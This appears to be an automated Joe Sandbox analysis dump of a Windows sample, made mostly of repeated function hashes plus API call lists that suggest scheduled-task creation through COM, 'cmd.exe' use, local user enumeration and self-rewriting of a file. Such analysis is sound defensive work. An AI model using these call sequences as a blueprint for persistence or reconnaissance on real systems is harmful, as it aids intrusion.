                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_UMwpXhA46R.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: 24b898cc278001aa302173b1ebfbe9ab6da14a012747f73bc7f8226c98198e4a
                                                                                                                                                                                                                    • Instruction ID: 4c2327c6d9ea0fd5f78b0127e51354d19f4113b4e822ec877585a6efb92c7c58
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 24b898cc278001aa302173b1ebfbe9ab6da14a012747f73bc7f8226c98198e4a
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CD62BC70E00A269BEB0CCF55C4906EDBBB2FF85311F24826EC81667B85D778A955CF84
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.2153786552.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000000.00000002.2153786552.000000000045B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_UMwpXhA46R.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: d2bc618ccad3562935955a192db260dfb9d2e6bee5d337b6c715297b9bec9ce8
                                                                                                                                                                                                                    • Instruction ID: 31199357ceec466129956888dd439b1d4a6f100edec160316ecfa63dcdc1427f
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d2bc618ccad3562935955a192db260dfb9d2e6bee5d337b6c715297b9bec9ce8
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1B42D371A002199FDB10DFA9C881AEFB7B1BF88304F54556EE446A7342D738BD45CBA8
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.2153786552.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000000.00000002.2153786552.000000000045B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_UMwpXhA46R.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: f5f03b92f91bc0fa13057e0a00df989dad41c0c834fe398416088b62e1f161a5
                                                                                                                                                                                                                    • Instruction ID: eac5d11cb92673f9bb66abbec7de51b37a046753e49d1a185180b8ac7a31a903
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f5f03b92f91bc0fa13057e0a00df989dad41c0c834fe398416088b62e1f161a5
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7D122630A047859FEB25CF18C9806AEB7F1AF96710F14855FE4A68B391C738EE46CB54
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.2153786552.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000000.00000002.2153786552.000000000045B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_UMwpXhA46R.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: dbb3dbd4f1a7e42d557d55f1836cfda86b2050670afa8ddbabdc4c804d563f80
                                                                                                                                                                                                                    • Instruction ID: 021bb5d2b7c0cb56e537b8d227e73ed21d0ebdb26bc59c524461a715ef61eba8
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: dbb3dbd4f1a7e42d557d55f1836cfda86b2050670afa8ddbabdc4c804d563f80
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FC12F630A047849FEB15CF28C9807AEBBF1AF96314F14855EE8A64B791C738ED42CB54
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.2153786552.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000000.00000002.2153786552.000000000045B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_UMwpXhA46R.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: 00cb6110a2b699abd96713e289be10720307309afa9449c25425e0025887b9a6
                                                                                                                                                                                                                    • Instruction ID: c4f7584d98bb462e22f8ca5efa45b381d380756b5cf0509a019ae382a9018600
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 00cb6110a2b699abd96713e289be10720307309afa9449c25425e0025887b9a6
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B1121570A007859FEB25CF18C9806AEBBF1AF96711F14855FE4A68B351C738EE42CB54
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.2153786552.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000000.00000002.2153786552.000000000045B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_UMwpXhA46R.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: 875064cff97081166aed1be67bd98ed2576c8f6fcc3bfcc6e64621cd83be4fae
                                                                                                                                                                                                                    • Instruction ID: b7b9f9f22af13d42a5b6316f7f2a44174fcb43b43f91c23f0d1d097708033df0
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 875064cff97081166aed1be67bd98ed2576c8f6fcc3bfcc6e64621cd83be4fae
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F312E530A047859FEB25CF28CA8069A7BF1BF56310F54855EF8A58B381C778ED42CB64
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.2153786552.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000000.00000002.2153786552.000000000045B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_UMwpXhA46R.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: de9ff50583ee048039bb51e6425aa69cb088ad25014410a60100640d1a31ab45
                                                                                                                                                                                                                    • Instruction ID: c96630ca6486ca8a3dffba479f0708cf21e85e20dbdd268f71493559b7ccfc47
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: de9ff50583ee048039bb51e6425aa69cb088ad25014410a60100640d1a31ab45
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 91021630A007459FEB24CF18C9806AFB7E1EF91314F14856FE9A68B391D738AD56C798
Memory Dump Source
• Source File: 00000000.00000002.2153786552.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2153786552.000000000045B000.00000040.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_UMwpXhA46R.jbxd
Memory Dump Source
• Source File: 00000000.00000002.2153786552.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2153786552.000000000045B000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_UMwpXhA46R.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: 30296fb46389e41053c9c1891a2e91179b26c183d1817db7ada92d60d53047d1
                                                                                                                                                                                                                    • Instruction ID: b8886794a6e5007edff55ecb8f40356a68830081a2fd7a3c661494ca94f11cdd
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 30296fb46389e41053c9c1891a2e91179b26c183d1817db7ada92d60d53047d1
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1581C5319893918BC795DF38C8D56D6BBB1EE4322432E85DDC8940EA03E22F651BDF51
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.2153786552.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000000.00000002.2153786552.000000000045B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_UMwpXhA46R.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: 031776b64819325f8bc44260e121548c68ef4edaa7e8b27829c2e6f5598c06c9
                                                                                                                                                                                                                    • Instruction ID: 74367e3e6ab0b74d7f5c1cf3bcaa0d89af6e6a6e1ec9fa16ff19e2e679a1abb2
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 031776b64819325f8bc44260e121548c68ef4edaa7e8b27829c2e6f5598c06c9
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5551C633F219214BF348CA79CC8415A73D3EBCE31071AC27AD901D7295E974E96396C5
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.2153786552.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000000.00000002.2153786552.000000000045B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_UMwpXhA46R.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: 90413d9f9a7a2a51136cfd3257986b2c0b32359f2b68ce7d43070aef4feff374
                                                                                                                                                                                                                    • Instruction ID: 6b590965bade377d4829cb5edd661b89940232f3d33fb21e100e917a0d425a21
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 90413d9f9a7a2a51136cfd3257986b2c0b32359f2b68ce7d43070aef4feff374
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F6518E7190D3928BD311CF29C48066BFBE1AFD9314F048A6EF8C4A7351D7788A49CB96
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.2153786552.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000000.00000002.2153786552.000000000045B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_UMwpXhA46R.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: f940f7e9c8dad2819d7ac41217777f41bdb57ab302bde7adc409946197b50135
                                                                                                                                                                                                                    • Instruction ID: e5d6b1d35e3d87a4e74f21fc64f62253c0a3e01d769b06703654ef7c4b1d687f
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f940f7e9c8dad2819d7ac41217777f41bdb57ab302bde7adc409946197b50135
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F941C377E51A3947F3188949CD81754AA52ABCC324F2B83B5CD2C6B316D8B9ED039AD0
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.2153786552.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000000.00000002.2153786552.000000000045B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_UMwpXhA46R.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: a9bc7354a3e354d1b015df0f8da07e1055657b15d563b5e6f57843a172319e40
                                                                                                                                                                                                                    • Instruction ID: d8d0adafabcbd5d708f1da50a49402fb3bf4ae1d939e6727f3124d8f61b49aed
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a9bc7354a3e354d1b015df0f8da07e1055657b15d563b5e6f57843a172319e40
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: ED51A17150C3A18BD315CF2AC48066BBBE1BBC9314F048E6EE8D497351D778DA09CB96
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.2153786552.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000000.00000002.2153786552.000000000045B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_UMwpXhA46R.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: f20fa1024a9688b10060da5d67fc074633dd4eaa16d4fe3a3c2409f5f1f9c4f6
                                                                                                                                                                                                                    • Instruction ID: c0d06c3b42bc6b51c97fcab68d65b60e5fd230549ea87696981b9f88f0129265
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f20fa1024a9688b10060da5d67fc074633dd4eaa16d4fe3a3c2409f5f1f9c4f6
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 00214F339748B601E7504B718D586227BD2CFCB206FAF81B5D644C7992D63ED4029564
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.2153786552.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000000.00000002.2153786552.000000000045B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_UMwpXhA46R.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: e9c930fd42fec790c80e573c3d74de70e79dd5c7963e19442b8978de89fab75a
                                                                                                                                                                                                                    • Instruction ID: 83a3f7d0e66a37bb7e6fdedb80276840f88715c9868f56da058082779efa7e5d
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e9c930fd42fec790c80e573c3d74de70e79dd5c7963e19442b8978de89fab75a
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2101C92BB7CE0E45C51940AC1424A6A11801B127657D4063BAAC7F83D5EFEDD86FD84F
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.2153786552.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000000.00000002.2153786552.000000000045B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_UMwpXhA46R.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: 81f8b4470660630fa8e642daca3cb37112d29c707e5c6907703c9fc4351451dd
                                                                                                                                                                                                                    • Instruction ID: b04785f1e362cafcd50622ec6ea8703a75b25b73c25fc77f3c2a0d59776fd131
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 81f8b4470660630fa8e642daca3cb37112d29c707e5c6907703c9fc4351451dd
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2B01F7B19053189FEB20CF94DD8579BBBF4FB01305F40809DE98D93240C3755644CB96
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.2153786552.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000000.00000002.2153786552.000000000045B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_UMwpXhA46R.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • Opcode ID: 6330c77cc73779100b967b3bed00ed2b0f65b3f262f43be70dde04e2a63f31f2
                                                                                                                                                                                                                    • Instruction ID: 7532f4c657dbcf864b1e0f3702b5c669a99d63d3a165ab0069a886a8ac68f27f
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6330c77cc73779100b967b3bed00ed2b0f65b3f262f43be70dde04e2a63f31f2
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4AC04C36111850CFC642DB08E144D81B3E4EF05631B0A84C5A4055B621C234ED41CA40
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,?,?,?,?,?,?,00000000,76D6DB30), ref: 004035AB
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,76D6DB30), ref: 004035F7
                                                                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,76D6DB30), ref: 004035FE
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00403616
                                                                                                                                                                                                                    • _snwprintf.MSVCRT ref: 00403630
                                                                                                                                                                                                                    • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00403653
                                                                                                                                                                                                                    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 0040366A
                                                                                                                                                                                                                    • GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040367E
                                                                                                                                                                                                                    • ReadFile.KERNEL32(00000000,00000000,?,?,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 004036D3
                                                                                                                                                                                                                    • wcsstr.MSVCRT ref: 004036F2
                                                                                                                                                                                                                    • wcsstr.MSVCRT ref: 00403725
                                                                                                                                                                                                                    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 004037BB
                                                                                                                                                                                                                    • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 004037EC
                                                                                                                                                                                                                    • SetEndOfFile.KERNEL32(00000000), ref: 004037F3
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 004037FA
                                                                                                                                                                                                                    • VariantInit.OLEAUT32(00000000), ref: 0040382B
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00403887
                                                                                                                                                                                                                    • HeapValidate.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040388A
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00403897
                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040389A
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 004038AD
                                                                                                                                                                                                                    • HeapValidate.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 004038B0
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 004038BD
                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 004038C0
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.2153786552.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2153786552.000000000045B000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_UMwpXhA46R.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Heap$File$Process$FreePointerValidatewcsstr$AllocCloseCreateHandleInitModuleNameReadSizeVariantWrite_snwprintfmemset
                                                                                                                                                                                                                    • String ID: 00-->$<Actions $p=Dv
                                                                                                                                                                                                                    • API String ID: 3028510665-2653830224
                                                                                                                                                                                                                    • Opcode ID: 955b91e7d97598c02b1fd98b2500fdb02c6b2481e78ce23fabddc674594c4510
                                                                                                                                                                                                                    • Instruction ID: 60e659956de6826fb5c9e3504b81639812d481b549725b71a5a6ffd7b5f9c5d4
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 955b91e7d97598c02b1fd98b2500fdb02c6b2481e78ce23fabddc674594c4510
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CBA1CEB2504311ABC720DF64CC48F5B7BA8EFC8751F048669FA45EB291D774EA04CBA8
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • CoInitializeEx.OLE32(00000000,00000000,?,?,76D6DB30), ref: 00402F40
                                                                                                                                                                                                                    • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000006,00000003,00000000,00000000,00000000), ref: 00402F60
                                                                                                                                                                                                                    • CoCreateInstance.OLE32(004043F0,00000000,00000001,004041E0,?), ref: 00402F87
                                                                                                                                                                                                                    • VariantInit.OLEAUT32(?), ref: 00402F9F
                                                                                                                                                                                                                    • VariantInit.OLEAUT32(?), ref: 00402FBA
                                                                                                                                                                                                                    • VariantInit.OLEAUT32(?), ref: 00402FD8
                                                                                                                                                                                                                    • VariantInit.OLEAUT32(?), ref: 00402FF6
                                                                                                                                                                                                                    • VariantClear.OLEAUT32(?), ref: 0040307C
                                                                                                                                                                                                                    • CreateFileMappingW.KERNELBASE(?), ref: 00403082
                                                                                                                                                                                                                    • VariantClear.OLEAUT32(?), ref: 00403088
                                                                                                                                                                                                                    • VariantClear.OLEAUT32(?), ref: 0040308E
                                                                                                                                                                                                                    • InterlockedDecrement.KERNEL32(004035B6), ref: 004030CD
                                                                                                                                                                                                                    • SysAllocString.OLEAUT32(00404EEC), ref: 00403276
                                                                                                                                                                                                                    • VariantInit.OLEAUT32(?), ref: 0040329B
                                                                                                                                                                                                                    • VariantInit.OLEAUT32(?), ref: 004032B9
                                                                                                                                                                                                                      • Part of subcall function 00402E50: GetProcessHeap.KERNEL32(00000008,00000010,00000000,?,004030A1,00404ED8), ref: 00402E58
                                                                                                                                                                                                                      • Part of subcall function 00402E50: HeapAlloc.KERNEL32(00000000,?,004030A1,00404ED8), ref: 00402E5F
                                                                                                                                                                                                                      • Part of subcall function 00402E50: SysAllocString.OLEAUT32(004030A1), ref: 00402E80
                                                                                                                                                                                                                    • VariantClear.OLEAUT32(?), ref: 00403366
                                                                                                                                                                                                                    • VariantClear.OLEAUT32(?), ref: 0040336C
                                                                                                                                                                                                                    • VariantClear.OLEAUT32(?), ref: 00403372
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.2153786552.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2153786552.000000000045B000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_UMwpXhA46R.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Variant$ClearInit$Alloc$CreateHeapInitializeString$DecrementFileInstanceInterlockedMappingProcessSecurity
                                                                                                                                                                                                                    • String ID: cmd.exe$p=Dv
                                                                                                                                                                                                                    • API String ID: 3029307448-1819144570
                                                                                                                                                                                                                    • Opcode ID: ce624a195721d34df8c0ff0fb2f0b689a1a1700c9ed8d61842eb4ad22ab92356
                                                                                                                                                                                                                    • Instruction ID: 9e23888bed06d8ec6237e29dc82f696ab5e76098d001fcea0e973b2596c5eb93
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ce624a195721d34df8c0ff0fb2f0b689a1a1700c9ed8d61842eb4ad22ab92356
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 64F10875E002199FCB00DFA8C884A9EBBB9FF88710F1581AAE914BB351D774AD01CF94
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,00000000,76D6DB30), ref: 00401DA6
                                                                                                                                                                                                                    • NetQueryDisplayInformation.NETAPI32(00000000,00000001,00000000,000003E8,000000FF,?,?,?,00000000,76D6DB30), ref: 00401DC2
                                                                                                                                                                                                                    • _snprintf.MSVCRT ref: 00401E08
                                                                                                                                                                                                                    • NetUserGetInfo.NETAPI32(00000000,00000000,00000001,?), ref: 00401E19
                                                                                                                                                                                                                    • NetApiBufferFree.NETAPI32(?), ref: 00401E3A
                                                                                                                                                                                                                    • NetApiBufferFree.NETAPI32(?), ref: 00401E45
                                                                                                                                                                                                                      • Part of subcall function 004017F0: memset.MSVCRT ref: 0040181B
                                                                                                                                                                                                                      • Part of subcall function 004017F0: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,75C25430,00000000,?), ref: 00401833
                                                                                                                                                                                                                      • Part of subcall function 004017F0: GetProcessHeap.KERNEL32(00000008,-00000011), ref: 0040185D
                                                                                                                                                                                                                      • Part of subcall function 004017F0: HeapAlloc.KERNEL32(00000000), ref: 00401860
                                                                                                                                                                                                                      • Part of subcall function 004017F0: memset.MSVCRT ref: 00401873
                                                                                                                                                                                                                      • Part of subcall function 004017F0: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000000), ref: 00401898
                                                                                                                                                                                                                      • Part of subcall function 004017F0: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000), ref: 004018AC
                                                                                                                                                                                                                      • Part of subcall function 004017F0: GetProcessHeap.KERNEL32(00000008,-00000011), ref: 004018CA
                                                                                                                                                                                                                      • Part of subcall function 004017F0: HeapAlloc.KERNEL32(00000000), ref: 004018CD
                                                                                                                                                                                                                      • Part of subcall function 004017F0: memset.MSVCRT ref: 004018DD
                                                                                                                                                                                                                      • Part of subcall function 004017F0: MultiByteToWideChar.KERNEL32(00000000,00000000,00401E65,000000FF,00000000,00000000), ref: 004018FF
                                                                                                                                                                                                                      • Part of subcall function 004017F0: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000), ref: 00401913
                                                                                                                                                                                                                      • Part of subcall function 004017F0: GetProcessHeap.KERNEL32(00000008,00000015), ref: 00401933
